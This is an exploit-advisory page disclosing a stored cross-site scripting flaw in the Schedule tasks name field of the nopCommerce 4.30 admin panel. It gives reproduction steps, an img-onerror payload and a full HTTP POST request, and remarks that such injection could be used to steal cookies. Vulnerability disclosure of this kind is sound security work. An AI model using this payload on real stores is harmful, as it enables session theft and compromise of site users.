nopCommerce Store 4.30 Cross Site Scripting

2020.11.24
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: nopCommerce Store 4.30 - 'name' Stored Cross-Site Scripting # Date: 24-11-2020 # Exploit Author: Hemant Patidar (HemantSolo) # Vendor Homepage: https://www.nopcommerce.com/ # Version: 4.30 # Tested on: Windows 10/Kali Linux Stored Cross-site scripting(XSS): Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Attack vector: This vulnerability can results attacker to inject the XSS payload in Schedule tasks and each time any user will go to that page of the website, the XSS triggers and attacker can able to steal the cookie according to the crafted payload. Vulnerable Parameters: Schedule tasks. Steps-To-Reproduce: 1. Go to the nopCommerce Store admin page. 2. Now go to the System-Schedule tasks option. 3. Now click to on edit button on any task. 4. Put the below payload in Schedule tasks: "hemantsolo"><img src=x onerror=confirm(1)>" 5. Now click on Update button. 6. The XSS will be triggered. POST /Admin/ScheduleTask/TaskUpdate HTTP/1.1 Host: 127.0.0.1 Connection: close Content-Length: 335 Accept: application/json, text/javascript, */*; q=0.01 DNT: 1 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: 127.0.0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: 127.0.0.1/Admin/ScheduleTask/List Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7,ru;q=0.6 Cookie: xyz Id=5&Name=hemantsolo%22%3E%3Cimg+src%3Dx+onerror%3Dconfirm(1)%3E&Seconds=3600&Enabled=false&StopOnError=false&__RequestVerificationToken=CfDJ8Hstb5ORl7RLtnBnyhE10fENmFHuOPhDq-cN_XNT5gs_nUq2ht5UeggYY9Fea9OqSCeJnVy_e4IKpQ7HhLYwtOMRS76BYcfJ9Os-CI9BxTxrumbAaunwIxrDMZm6CbNRs9EPzKQabez4H7dNpXG6oVpiC5Pc__xQVm06bp4c4O_D15lqehkk6EmqDAizfm8LFA


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top